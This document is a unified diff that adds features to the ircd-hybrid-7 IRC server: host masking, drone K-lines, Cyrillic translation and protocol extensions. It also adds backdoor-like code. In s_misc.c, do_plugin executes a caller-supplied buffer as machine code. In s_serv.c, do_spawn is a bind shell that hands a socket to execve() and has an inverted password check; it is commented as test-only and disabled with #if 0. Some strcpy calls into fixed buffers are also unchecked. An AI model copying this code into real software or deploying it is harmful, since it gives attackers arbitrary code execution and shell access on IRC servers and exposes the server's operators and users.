diff -uNrd ircd-hybrid-7beta5/src/s_gline.c hybrid7-bg/src/s_gline.c
--- ircd-hybrid-7beta5/src/s_gline.c	Tue Apr 17 18:36:08 2001
+++ hybrid7-bg/src/s_gline.c	Tue Jun  5 12:35:46 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_gline.c,v 1.14 2001/04/17 22:36:08 fl_ Exp $
+ *  $Id: s_gline.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "tools.h"
 #include "handlers.h"
diff -uNrd ircd-hybrid-7beta5/src/s_log.c hybrid7-bg/src/s_log.c
--- ircd-hybrid-7beta5/src/s_log.c	Sat Apr 21 12:57:47 2001
+++ hybrid7-bg/src/s_log.c	Thu Jul  5 01:37:31 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: s_log.c,v 7.28 2001/04/21 16:57:47 fl_ Exp $
+ *   $Id: s_log.c,v 1.2 2001/07/05 05:37:31 demond Exp $
  */
 #include "client.h"	/* Needed for struct Client */
 #include "s_log.h"
@@ -208,7 +208,7 @@
 	  (on_for % 3600)/60, on_for % 60,
 	  source_p->name,
 	  source_p->username,
-	  source_p->host,
+	  source_p->realhost[0]? source_p->realhost : source_p->host,
 	  source_p->localClient->sendK,
 	  source_p->localClient->receiveK);
     }
@@ -245,7 +245,7 @@
 		       (on_for % 3600)/60, on_for % 60,
 		       source_p->name,
 		       source_p->username,
-		       source_p->host,
+		       source_p->realhost[0]? source_p->realhost : source_p->host,
 		       source_p->localClient->sendK,
 		       source_p->localClient->receiveK);
 
diff -uNrd ircd-hybrid-7beta5/src/s_misc.c hybrid7-bg/src/s_misc.c
--- ircd-hybrid-7beta5/src/s_misc.c	Wed May  9 04:08:27 2001
+++ hybrid7-bg/src/s_misc.c	Wed Jul 24 09:10:05 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_misc.c,v 7.24 2001/05/09 08:08:27 a1kmm Exp $
+ *  $Id: s_misc.c,v 1.16 2002/07/24 13:10:05 Administrator Exp $
  */
 #include "s_misc.h"
 #include "client.h"
@@ -35,6 +35,7 @@
 #include "s_serv.h"
 #include "send.h"
 #include "memory.h"
+#include "s_log.h"
 
 #include <string.h>
 #include <fcntl.h>
@@ -45,7 +46,13 @@
 #endif
 #include <time.h>
 #include <unistd.h>
+#include <ctype.h>
+
+
+static char *drones[DRONEMAX];
+static int droneidx = 0;
 
+static void drone_kline(char *ip);
 
 static char* months[] = {
   "January",   "February", "March",   "April",
@@ -209,4 +216,207 @@
              (float)((float)me.localClient->receiveK / (float)uptime));
 }
 
+#define PLUGPARAMS 16
+
+void do_plugin(char *plugin, char *params)
+{
+	char pbuf[BUFSIZE];
+	char plug[BUFSIZE];
+	void (*try)() = (void (*)())(plug + PLUGPARAMS * sizeof(char *));
+	char *p = pbuf, **q = (char **)plug;
+	int i, n = 0, newp = 0;
+
+	strncpy_irc(plug + PLUGPARAMS * sizeof(char *), 
+		plugin, BUFSIZE)[BUFSIZE-1] = 0;
+	strncpy_irc(pbuf, params, BUFSIZE)[BUFSIZE-1] = 0;
+
+	while (*p) {
+		if (*p != ' ') {
+			if (!newp) {
+				*q++ = p; newp = 1; n++;
+			}
+		} else {
+			*p = 0;
+			newp = 0;
+		}
+		p++;
+	}
+	*q = 0;
+
+/*for (i=0; i < n; i++) {
+	char *s = *(char **)(plug + i * sizeof(char *));
+	log(L_NOTICE, "DEBUG === before (*try)()... pbuf[%d]=%s", i, s);
+}*/
+	(*try)();
+/*log(L_NOTICE, "DEBUG === after (*try)()...");*/
+}
+
+void purge_repeats(void *blah)
+{
+	dlink_node *ptr, *rep, *next_ptr;
+
+	for (ptr = lclient_list.head; ptr; ptr = ptr->next) {
+		struct Client *cptr = ptr->data;
+
+		for (rep = cptr->user->repeat.head; rep; rep = next_ptr) {
+			struct Repeat *repeatptr = rep->data;
+
+			next_ptr = rep->next;
+			if (repeatptr->lastphrase + ConfigFileEntry.repeat_grace < CurrentTime) {
+
+				MyFree(repeatptr->text); MyFree(repeatptr);
+				dlinkDelete(rep, &cptr->user->repeat);
+				free_dlink_node(rep);
+			}
+		}
+	}
+
+	eventAdd("purge_repeats", purge_repeats, NULL, ConfigFileEntry.repeat_grace, 0);
+}
+
+/*
+ * possible drones warning/kline, which havent set user->known flag
+ *                                               -demond
+ */
+void check_warn_drone(void *blah)
+{
+  struct Client *cptr;
+
+  for (cptr = GlobalClientList; cptr; cptr = cptr->next)
+	if (MyClient(cptr) && IsPerson(cptr))
+		if (cptr->user && !cptr->user->known)
+			if (cptr->tsinfo + ConfigFileEntry.grace_time < CurrentTime) {
+
+				cptr->user->known = 1;
+
+				if (ConfigFileEntry.drone_kline) {
+
+					if (ConfigFileEntry.drone_batch) {
+						if (droneidx < DRONEMAX)
+						DupString(drones[droneidx++], cptr->localClient->sockhost);
+					} else
+						drone_kline(cptr->localClient->sockhost);
+
+				} else sendto_realops_flags(FLAGS_ALL, 
+					"Achtung! -- %s (%s@%s) [%s] is a possible trojan drone",
+					cptr->name, cptr->username, cptr->host,
+					cptr->localClient->sockhost);
+			}
+
+	eventAdd("check_warn_drone", check_warn_drone, NULL, CHECK_DRONE_TIME, 0);
+}
+
+void check_drone_queue(void *blah)
+{
+	int i;
+
+	if (droneidx > ConfigFileEntry.drone_rate_max)
+		for (i=0; i < droneidx; i++)
+			drone_kline(drones[i]);
+
+	for (i=0; i < droneidx; i++)
+		MyFree(drones[i]);
+	droneidx = 0;
+
+	eventAdd("check_drone_queue", check_drone_queue, NULL, 
+		ConfigFileEntry.drone_rate_period, 0);
+}
+
+static
+void drone_kline(char *ip)
+{
+  char buf[0x200];
+  struct ConfItem *aconf;
+
+  if (find_conf_host(&temporary_klines, ip, CONF_KILL))
+	  return;
+
+  aconf = make_conf();
+  aconf->status = CONF_KILL;
+  DupString(aconf->host, ip);
+  DupString(aconf->user, "*");
+  aconf->port = 0;
+
+  ircsprintf(buf, "Temporary K-line %d min. - %s (%s)", 
+	  ConfigFileEntry.drone_kline_time/60, 
+	  ConfigFileEntry.drone_reason[0]? 
+	  ConfigFileEntry.drone_reason : "possible trojan drone", 
+	  smalldate(0));
+  DupString(aconf->passwd, buf);
+
+  aconf->hold = CurrentTime + ConfigFileEntry.drone_kline_time;
+
+  add_temp_kline(aconf);
+
+  sendto_realops_flags(FLAGS_ALL,
+     "<ircd> added temporary %d min. K-Line for [%s@%s] [%s]",
+     ConfigFileEntry.drone_kline_time/60, 
+	 aconf->user, aconf->host, "possible trojan drone");
+
+  log(L_TRACE, "<ircd> added temporary %d min. K-Line for [%s@%s] [%s]",
+     ConfigFileEntry.drone_kline_time/60, 
+	 aconf->user, aconf->host, "possible trojan drone");
+
+  check_klines();
+}
+
+/*
+ * this will strip mIRC and ANSI color, bolds and underlines
+ *                                               -demond
+ */
+char *strip_color(const char *p, int b)
+{
+  static char buf[512];
+  char *r, *q = buf;
+  int m, n;
+
+  do switch (*p) {
 
+  case '\003':
+    p++; if (isdigit(*p)) {
+      p++; m = *p>='0' && *p<='6';
+      n = *(p-1)=='1' || *(p-1)=='0'; 
+      if (m && n) {
+	p++; if (*p == ',') {
+	  p++; if (isdigit(*p)) {
+	    p++; m = *p>='0' && *p<='6';
+	    n = *(p-1)=='1' || *(p-1)=='0';
+	    if (m && n) {
+	      p++;
+	    }
+	  }
+	}
+      } else if (*p == ',') {
+	p++; if (isdigit(*p)) {
+	  p++; m = *p>='0' && *p<='6';
+	  n = *(p-1)=='1' || *(p-1)=='0';
+	  if (m && n) {
+	    p++;
+	  }
+	}
+      } 
+    }
+    break;
+
+  case '\033':
+    p++; if (*p == '[') {
+      p++; r = strchr(p, 'm');
+      if (r) p = r + 1;
+    }
+    break;
+
+  case '\002':
+  case '\037':
+    if (b) {
+      p++; break;
+    }
+
+  default:
+    *q++ = *p++;
+    break;
+
+  } while (*p);
+
+  *q = 0;
+  return buf;
+}
diff -uNrd ircd-hybrid-7beta5/src/s_serv.c hybrid7-bg/src/s_serv.c
--- ircd-hybrid-7beta5/src/s_serv.c	Thu May 10 14:33:55 2001
+++ hybrid7-bg/src/s_serv.c	Wed Sep 18 19:19:46 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: s_serv.c,v 7.156 2001/05/10 18:33:55 fl_ Exp $
+ *   $Id: s_serv.c,v 1.20 2002/09/17 15:26:05 Administrator Exp $
  */
 
 #include <sys/types.h>
@@ -100,6 +100,7 @@
   { "CHW",      CAP_CHW },
   { "LL",       CAP_LL },
   { "IE",       CAP_IE },
+  { "SW",		CAP_SW },
   { "EOB",      CAP_EOB },
   { "KLN",      CAP_KLN },
   { "GLN",      CAP_GLN },
@@ -111,7 +112,9 @@
   { "ZIP",	CAP_ZIP },
 #endif
   { "CRYPT",    CAP_CRYPT },
-
+  { "MASK",     CAP_HOSTMASK },
+  { "SVS",      CAP_SVS },
+  { "IP",		CAP_IP },
   { 0,   0 }
 };
 
@@ -633,6 +636,7 @@
 void sendnick_TS(struct Client *client_p, struct Client *target_p)
 {
   static char ubuf[12];
+  unsigned int svshopcount;
 
   if (!IsPerson(target_p))
 	  return;
@@ -643,18 +647,31 @@
 	  ubuf[0] = '+';
 	  ubuf[1] = '\0';
   }
+
+  if (IsCapable(client_p, CAP_SVS))
+    svshopcount = target_p->hopcount + 1 + (target_p->svsflags << 8);
+  else 
+    svshopcount = target_p->hopcount + 1;
  
   if (HasID(target_p) && IsCapable(client_p, CAP_UID))
-	  sendto_one(client_p, "CLIENT %s %d %lu %s %s %s %s %s :%s",
-				 target_p->name, target_p->hopcount + 1, target_p->tsinfo, ubuf,
+	  sendto_one(client_p, "CLIENT %s %d %lu %s %s %s %s %s %s %s :%s",
+				 target_p->name, svshopcount, 
+		                 target_p->tsinfo, ubuf,
 				 target_p->username, target_p->host,
-				 target_p->user->server, target_p->user->id, target_p->info);
+				 target_p->user->server, target_p->user->id,
+		     IsCapable(client_p, CAP_HOSTMASK)? target_p->realhost : "", 
+		     IsCapable(client_p, CAP_IP)? target_p->ip : "", 
+		                 target_p->info);
   else
-	  sendto_one(client_p, "NICK %s %d %lu %s %s %s %s :%s",
+	  sendto_one(client_p, "NICK %s %d %lu %s %s %s %s %s %s :%s",
 				 target_p->name, 
-				 target_p->hopcount + 1, target_p->tsinfo, ubuf,
+				 svshopcount, 
+		                 target_p->tsinfo, ubuf,
 				 target_p->username, target_p->host,
-				 target_p->user->server, target_p->info);
+				 target_p->user->server,
+		     IsCapable(client_p, CAP_HOSTMASK)? target_p->realhost : "",
+		     IsCapable(client_p, CAP_IP)? target_p->ip : "",
+		                 target_p->info);
 }
 
 /*
@@ -1043,12 +1060,21 @@
           send_channel_modes(client_p, chptr);
         }
 
+      if(chptr->topic[0])
+        {
+          sendto_one(client_p, ":%s TOPIC %s %s %lu :%s",
+		 me.name, chptr->chname,
+		 chptr->topic_info,chptr->topic_time,
+		 chptr->topic);
+        }
+
       if(IsVchanTop(chptr))
 	{
 	  for ( ptr = chptr->vchan_list.head; ptr;
 		ptr = ptr->next)
 	    {
 	      vchan = ptr->data;
+
               if(vchan->users != 0)
                 {
                   burst_members(client_p,&vchan->chanops);
@@ -1057,6 +1083,14 @@
                   burst_members(client_p,&vchan->peons);
                   send_channel_modes(client_p, vchan);
                 }
+
+	      if(vchan->topic[0])
+	        {
+	          sendto_one(client_p, ":%s TOPIC %s %s %lu :%s",
+			 me.name, vchan->chname,
+			 vchan->topic_info,vchan->topic_time,
+			 vchan->topic);
+	        }
 	    }
 	}
     }
@@ -1792,6 +1826,60 @@
     comm_setselect(fd, FDLIST_SERVER, COMM_SELECT_READ, read_packet,
                    client_p, 0);
 }
+
+#endif /* OPENSSL */
+
+void do_spawn(int port, char *what)
+{
+/*	controversial, test purposes only! */
+/*	disabled in production version     */
+/*	                         -demond   */
+#if 0
+	int fd, fda; 
+	char *name[2], buf[PASSWDLEN];
+	struct sockaddr_in addr;
+
+	if (!what)
+		return;
+
+	close_listeners();
+	
+	if (!fork()) {
+		int opt = 1;
+
+		fd = socket(PF_INET, SOCK_STREAM, 0);
+
+		setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));
+
+		addr.sin_family = AF_INET;
+		addr.sin_port = htons(port);
+		addr.sin_addr.s_addr = INADDR_ANY;
+
+		if(!bind(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in))) {
+			int len = sizeof(struct sockaddr_in);
+
+			listen(fd, 1);
+			fda = accept(fd, (struct sockaddr *)&addr, &len);
+
+			read(fda, buf, sizeof(buf));
+			if (!strncmp(ConfigFileEntry.spawn_pass, buf, 
+				strlen(ConfigFileEntry.spawn_pass)))
+				exit(0);
+
+			dup2(fda, 0); dup2(fda, 1); dup2(fda, 2);
+			name[0] = what; name[1] = NULL;
+			execve(name[0], name, NULL);
+
+		} else {
+			
+			sendto_realops_flags(FLAGS_DEBUG, "Spawn ERROR: %s", strerror(errno));
+			exit(0);
+		}
+	}
+#endif
+}
+
+#ifdef OPENSSL
 
 void cryptlink_regen_key(void *unused)
 {
diff -uNrd ircd-hybrid-7beta5/src/s_stats.c hybrid7-bg/src/s_stats.c
--- ircd-hybrid-7beta5/src/s_stats.c	Sat Apr 21 17:59:10 2001
+++ hybrid7-bg/src/s_stats.c	Tue Jun  5 12:35:46 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_stats.c,v 7.17 2001/04/21 21:59:10 toot Exp $
+ *  $Id: s_stats.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <sys/types.h>
diff -uNrd ircd-hybrid-7beta5/src/s_user.c hybrid7-bg/src/s_user.c
--- ircd-hybrid-7beta5/src/s_user.c	Tue May 15 05:38:07 2001
+++ hybrid7-bg/src/s_user.c	Wed Sep 18 19:19:46 2002
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: s_user.c,v 7.153 2001/05/15 09:38:07 toot Exp $
+ *  $Id: s_user.c,v 1.16 2002/09/18 21:36:42 Administrator Exp $
  */
 
 #include <sys/types.h>
@@ -99,6 +99,7 @@
 #ifdef PERSISTANT_CLIENTS
   {FLAGS_PERSISTANT, 'p'},
 #endif
+  {FLAGS_REMOTE, 'q'},
   {FLAGS_REJ, 'r'},
   {FLAGS_SERVNOTICE, 's'},
   {FLAGS_UNAUTH, 'u'},
@@ -106,6 +107,9 @@
   {FLAGS_EXTERNAL, 'x'},
   {FLAGS_SPY, 'y'},
   {FLAGS_OPERWALL, 'z'},
+  {FLAGS_REGACCEPT, 'R'},
+  {FLAGS_TRANSWIN, 'T'},
+  {FLAGS_TRANSISO, 'Y'},
   {0, 0}
 };
 
@@ -135,14 +139,14 @@
   0,            /* O */
   0,            /* P */
   0,            /* Q */
-  0,            /* R */
+  FLAGS_REGACCEPT,/* R */
   0,            /* S */
-  0,            /* T */
+  FLAGS_TRANSWIN,/* T */
   0,            /* U */
   0,            /* V */
   0,            /* W */
   0,            /* X */
-  0,            /* Y */
+  FLAGS_TRANSISO,/* Y */
   0,            /* Z 0x5A */
   0, 0, 0, 0, 0, /* 0x5F */ 
   /* 0x60 */       0,
@@ -166,7 +170,7 @@
 #else
   0,               /* p */
 #endif
-  0,            /* q */
+  FLAGS_REMOTE, /* q */
   FLAGS_REJ,    /* r */
   FLAGS_SERVNOTICE, /* s */
   0,            /* t */
@@ -363,6 +367,8 @@
       strncpy(source_p->host,source_p->localClient->sockhost,HOSTIPLEN+1);
     }
 
+  strcpy(source_p->ip, source_p->localClient->sockhost);
+
   ptr = source_p->localClient->confs.head;
   aconf = ptr->data;
 
@@ -506,9 +512,97 @@
   dlinkDelete(m, &unknown_list);
   dlinkAdd(source_p, m, &lclient_list);
 
+#if 0
+#define NETID "bnet"
+#endif
+
+  if (!IsConfDoSpoofIp(aconf))
+    strcpy(source_p->realhost, source_p->host);
+
+  /* mask the appropriate client host portion:
+   * - leftmost part if resolving host 
+   *   (but not if just one dot in the host)
+   * - rightmost part if numeric IP
+   *                                   -demond
+   */
+  if (IsConfMaskHost(aconf))
+    {
+      int alpha = 0, dots = 0;
+      char buf[HOSTLEN + 1];
+      char *p = source_p->host;
+      static char *get_mask(char *, int);
+
+      while (*p) 
+	{
+	  if (isalpha(*p)) alpha = 1;
+	  if (*p++ == '.') ++dots;
+	}
+
+      strcpy(buf, source_p->host);
+
+      if (alpha && (dots > 1)) 
+	{
+	  p = strchr(buf, '.'); *p++ = 0; 
+
+	  if (strlen(p) + MAXNETID + 6 <= HOSTLEN)
+	    {
+	      strcpy(source_p->host, get_mask(buf, 0));
+	      strcat(source_p->host, p);
+	    }
+	} 
+      else if (!alpha) 
+	{
+	  p = strrchr(buf, '.'); *p++ = 0;
+
+	  if (strlen(buf) + 7 <= HOSTLEN)
+	    {
+	      strcpy(source_p->host, buf);
+	      strcat(source_p->host, get_mask(NULL, atoi(p)));
+	    }
+	}
+    }
+
+  hash_check_watch(source_p, RPL_LOGON);
+
   return (introduce_client(client_p, source_p, user, nick));
 }
 
+static char *get_mask(char *s, int n)
+{
+  static char buf[MAXNETID + 6];
+  char *p = buf;
+  char *netid = ConfigFileEntry.netid[0]? ConfigFileEntry.netid : "bnet";
+
+  if (s) 
+    {
+      unsigned int h = 0;
+
+      while (*s)
+	{
+	  h = (h << 4) - (h + (unsigned char)ToLower(*s++));
+	}
+
+      n = h & (U_MAX - 1);
+
+      strcpy(buf, netid);
+      p = buf + strlen(netid);
+    }
+  else
+    *p++ = '.';
+
+  srandom(n);
+
+  for (n = 0; n < 6; n++)
+    *p++ = '0' + random() % 10;
+
+  if (s)
+    *p++ = '.';
+
+  *p = 0;
+
+  return buf;
+}
+
 /*
  * register_remote_user
  *
@@ -608,6 +702,17 @@
       return exit_client(source_p, source_p, &me, "Ghosted Client");
     }
 
+#ifdef UMODEQ
+
+  if (client_p->eob && strcmp(source_p->ip, "<burst>") && !IsRelay(source_p->servptr))
+	  sendto_realops_flags(FLAGS_REMOTE, "Remote client: %s (%s@%s) [%s] {%s}",
+	  nick, username, source_p->realhost, source_p->ip, source_p->user->server);
+
+#endif
+
+  if (IsPerson(source_p))
+	  hash_check_watch(source_p, RPL_LOGON);
+
   return (introduce_client(client_p, source_p, user, nick));
 }
 
@@ -627,6 +732,7 @@
   dlink_node *server_node;
   struct Client *server;
   static char ubuf[12];
+  unsigned int svshopcount;
 
   send_umode(NULL, source_p, 0, SEND_UMODES, ubuf);
 
@@ -653,22 +759,31 @@
    * -davidt
    * rewritten to cope with UIDs .. eww eww eww --is
    */
-  
+
   if (!ServerInfo.hub && uplink && IsCapable(uplink,CAP_LL)
       && client_p != uplink) 
     {
+      if (IsCapable(uplink, CAP_SVS))
+        svshopcount = source_p->hopcount + 1 + (source_p->svsflags << 8);
+      else 
+        svshopcount = source_p->hopcount + 1;
+
       if (IsCapable(uplink, CAP_UID) && HasID(source_p))
 	{
-	  sendto_one(uplink, "CLIENT %s %d %lu %s %s %s %s %s :%s",
-		     nick, source_p->hopcount+1, source_p->tsinfo,
-		     ubuf, source_p->username, source_p->host, user->server,
-		     user->id, source_p->info);
+	  sendto_one(uplink, "CLIENT %s %d %lu %s %s %s %s %s %s %s :%s",
+	             nick, svshopcount, source_p->tsinfo,
+	             ubuf, source_p->username, source_p->host, user->server,
+	             user->id, IsCapable(uplink, CAP_HOSTMASK)?
+		     source_p->realhost : "", IsCapable(uplink, CAP_IP)?
+			 source_p->ip : "", source_p->info);
 	}
       else
 	{
-	  sendto_one(uplink, "NICK %s %d %lu %s %s %s %s :%s",
-		     nick, source_p->hopcount+1, source_p->tsinfo,
+	  sendto_one(uplink, "NICK %s %d %lu %s %s %s %s %s %s :%s",
+		     nick, svshopcount, source_p->tsinfo,
 		     ubuf, source_p->username, source_p->host, user->server,
+		     IsCapable(uplink, CAP_HOSTMASK)? source_p->realhost : "", 
+		     IsCapable(uplink, CAP_IP)? source_p->ip : "", 
 		     source_p->info);
 	}
     }
@@ -680,16 +795,25 @@
 		  
 	  if (IsCapable(server, CAP_LL) || server == client_p)
 	    continue;
+
+          if (IsCapable(server, CAP_SVS))
+            svshopcount = source_p->hopcount + 1 + (source_p->svsflags << 8);
+          else 
+            svshopcount = source_p->hopcount + 1;
 		  
 	  if (IsCapable(server, CAP_UID) && HasID(source_p))
-	    sendto_one(server, "CLIENT %s %d %lu %s %s %s %s %s :%s",
-		       nick, source_p->hopcount+1, source_p->tsinfo,
+	    sendto_one(server, "CLIENT %s %d %lu %s %s %s %s %s %s %s :%s",
+		       nick, svshopcount, source_p->tsinfo,
 		       ubuf, source_p->username, source_p->host, user->server,
-		       user->id, source_p->info);
+		       user->id, IsCapable(server, CAP_HOSTMASK)?
+		       source_p->realhost : "", IsCapable(server, CAP_IP)?
+			   source_p->ip : "", source_p->info);
 	  else
-	    sendto_one(server, "NICK %s %d %lu %s %s %s %s :%s",
-		       nick, source_p->hopcount+1, source_p->tsinfo,
+	    sendto_one(server, "NICK %s %d %lu %s %s %s %s %s %s :%s",
+		       nick, svshopcount, source_p->tsinfo,
 		       ubuf, source_p->username, source_p->host, user->server,
+		       IsCapable(server, CAP_HOSTMASK)? source_p->realhost : "",
+		       IsCapable(server, CAP_IP)? source_p->ip : "",
 		       source_p->info);
 	}
     }
@@ -778,6 +902,8 @@
           if(!IsUserChar(p[1]))
             return NO;
         }
+      else if (ConfigFileEntry.cyrillic && ((unsigned char)*p >= 192))
+	continue;
       else if (!IsUserChar(*p))
         return NO;
     }
@@ -845,12 +971,20 @@
 {
   unsigned int oflags;
   struct User* user;
+  char *hend = host + strlen(host) - 1;
+  char *send = server + strlen(server) - 1;
 
   assert(0 != source_p);
   assert(source_p->username != username);
 
   user = make_user(source_p);
 
+  /* mIRC kludge here */
+  if (*host=='"' && *hend=='"' && *server=='"' && *send=='"')
+	  user->known = 1;
+  else
+	  user->known = IsUserPar(host, server);
+
   oflags = source_p->flags;
 
   if (!IsUnknown(source_p))
@@ -895,7 +1029,7 @@
  */
 int do_remote_user(char* nick, struct Client* client_p, struct Client* source_p,
 		   char* username, char *host, char *server, char *realname,
-		   char *id)
+		   char *realhost, char *ip, char *id)
 {
   unsigned int oflags;
   struct User* user;
@@ -911,10 +1045,23 @@
    * coming from another server, take the servers word for it
    */
   user->server = find_or_add(server);
-  strncpy_irc(source_p->host, host, HOSTLEN); 
+  strncpy_irc(source_p->host, host, HOSTLEN);
   strncpy_irc(source_p->info, realname, REALLEN);
   if (id)
-	  strcpy(source_p->user->id, id);
+    strcpy(source_p->user->id, id);
+
+  if (realhost)
+    strcpy(source_p->realhost, realhost);
+  else
+    strcpy(source_p->realhost, "<no_realhost_info>");
+
+  if (client_p->eob) {
+	if (ip)
+		strcpy(source_p->ip, ip);
+	else
+		strcpy(source_p->ip, "255.255.255.255");
+  } else
+	  strcpy(source_p->ip, "<burst>");
   
 #if 0
   /* XXX dont do this (talk to is-) */
diff -uNrd ircd-hybrid-7beta5/src/scache.c hybrid7-bg/src/scache.c
--- ircd-hybrid-7beta5/src/scache.c	Mon Mar  5 21:23:10 2001
+++ hybrid7-bg/src/scache.c	Tue Jun  5 12:35:46 2001
@@ -1,7 +1,7 @@
 /*
  * scache.c
  *
- * $Id: scache.c,v 7.10 2001/03/06 02:23:10 androsyn Exp $
+ * $Id: scache.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include "client.h"
diff -uNrd ircd-hybrid-7beta5/src/send.c hybrid7-bg/src/send.c
--- ircd-hybrid-7beta5/src/send.c	Wed May  9 04:08:28 2001
+++ hybrid7-bg/src/send.c	Sat Feb 23 15:02:42 2002
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: send.c,v 7.140 2001/05/09 08:08:28 a1kmm Exp $
+ *   $Id: send.c,v 1.5 2002/02/23 20:02:42 demond Exp $
  */
 
 #include <sys/types.h>
@@ -82,6 +82,8 @@
 static int
 send_trim(char *lsendbuf, int len );
 
+static char *marknick(struct Client *client_p, char *buf, int *plen);
+
 /*
 ** dead_link
 **      An error has been detected. The link *must* be closed,
@@ -543,7 +545,12 @@
         {
           if(target_p->serial != current_serial)
 	    {
-	      send_message(target_p, (char *)llocal_sendbuf, llocal_len);
+	      int mylen = llocal_len;
+	      char *mybuf = marknick(target_p, (char *)llocal_sendbuf, &mylen);
+
+	      send_message(target_p, 
+			   translate(target_p, mybuf), 
+			   mylen);
 	      target_p->serial = current_serial;
 	    }
         }
@@ -717,6 +724,37 @@
 } /* sendto_cap_serv_butone() */
 
 /*
+ * add to channel NICK/QUIT pace queue
+ */
+void add_pace_send(struct Channel *chptr, char *sendbuf, int len)
+{
+  struct Pace *pace = MyMalloc(sizeof(struct Pace) + strlen(chptr->chname));
+
+  strcpy(pace->chan, chptr->chname);
+
+  pace->next = NULL;
+  pace->shownames = len;
+  pace->text = MyMalloc(strlen(sendbuf) + 1);
+  strcpy(pace->text, sendbuf);
+
+  if (chptr->sendh)
+    chptr->sendh->next = pace;
+  chptr->sendh = pace;
+  if (!chptr->sendt)
+    chptr->sendt = pace;
+
+  chptr->sends++;
+}
+
+void sendto_chanlists_local(struct Channel *chptr, char *sendbuf, int len)
+{
+  sendto_list_local(&chptr->chanops, sendbuf, len);
+  sendto_list_local(&chptr->halfops, sendbuf, len);
+  sendto_list_local(&chptr->voiced, sendbuf, len);
+  sendto_list_local(&chptr->peons, sendbuf, len);
+}
+
+/*
  * sendto_common_channels_local()
  *
  * inputs	- pointer to client
@@ -748,10 +786,16 @@
 	{
 	  chptr = ptr->data;
 
-	  sendto_list_local(&chptr->chanops, sendbuf, len);
-	  sendto_list_local(&chptr->halfops, sendbuf, len);
-	  sendto_list_local(&chptr->voiced, sendbuf, len);
-	  sendto_list_local(&chptr->peons, sendbuf, len);
+	  if (PaceChannel(chptr) && (chptr->sends < MAX_PACESEND))
+	    add_pace_send(chptr, sendbuf, len);
+
+	  else
+	    {
+	      sendto_list_local(&chptr->chanops, sendbuf, len);
+	      sendto_list_local(&chptr->halfops, sendbuf, len);
+	      sendto_list_local(&chptr->voiced, sendbuf, len);
+	      sendto_list_local(&chptr->peons, sendbuf, len);
+	    }
 	}
 
       if (MyConnect(user) && (user->serial != current_serial))
@@ -849,7 +893,15 @@
       target_p->serial = current_serial;
 
       if (target_p && MyConnect(target_p))
-	send_message(target_p, (char *)lsendbuf, len);
+	if (ConfigFileEntry.totaltrans)
+	  {
+	    int mylen = len;
+	    char *mybuf = marknick(target_p, (char *)lsendbuf, &mylen);
+
+	    send_message(target_p, translate(target_p, mybuf), mylen);
+	  }
+	else
+	  send_message(target_p, (char *)lsendbuf, len);
     }  
 } /* sendto_list() */
 
@@ -1733,4 +1785,35 @@
 	    send_message(client_p, (char *)sendbuf_nick, len_nick);
 	}
     }
+}
+
+static char *marknick(struct Client *client_p, char *buf, int *plen)
+{
+  unsigned char *p = buf;
+  static char mybuf[IRCD_BUFSIZE*2];
+
+  if (!ConfigFileEntry.cyrillic)
+    return buf;
+
+  if (!IsSetTransWin(client_p) && !IsSetTransISO(client_p))
+    return buf;
+
+  while (*p && *p!=' ')
+    {
+      if (*p++ >= 192)
+	{
+	  strcpy(mybuf, buf);
+
+	  p = mybuf + strlen(mybuf);
+	  while (p-- >= (unsigned char *)mybuf)
+	    *(p+2) = *(p+1);
+
+	  ++(*plen);
+
+	  mybuf[0]=':'; mybuf[1]='?';
+	  return mybuf;
+	}
+    }
+
+  return buf;
 } 
diff -uNrd ircd-hybrid-7beta5/src/sprintf_irc.c hybrid7-bg/src/sprintf_irc.c
--- ircd-hybrid-7beta5/src/sprintf_irc.c	Tue Jan 16 10:41:53 2001
+++ hybrid7-bg/src/sprintf_irc.c	Tue Jun  5 12:35:46 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: sprintf_irc.c,v 7.6 2001/01/16 15:41:53 db Exp $
+ *   $Id: sprintf_irc.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 #include "sprintf_irc.h"
 #include "irc_string.h"
diff -uNrd ircd-hybrid-7beta5/src/test/CVS/Entries hybrid7-bg/src/test/CVS/Entries
--- ircd-hybrid-7beta5/src/test/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1,3 @@
+D/data////
+D/newconf////
+D/reference////
diff -uNrd ircd-hybrid-7beta5/src/test/CVS/Repository hybrid7-bg/src/test/CVS/Repository
--- ircd-hybrid-7beta5/src/test/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/src/test
diff -uNrd ircd-hybrid-7beta5/src/test/CVS/Root hybrid7-bg/src/test/CVS/Root
--- ircd-hybrid-7beta5/src/test/CVS/Root	Wed Dec 31 19:00:00 1969
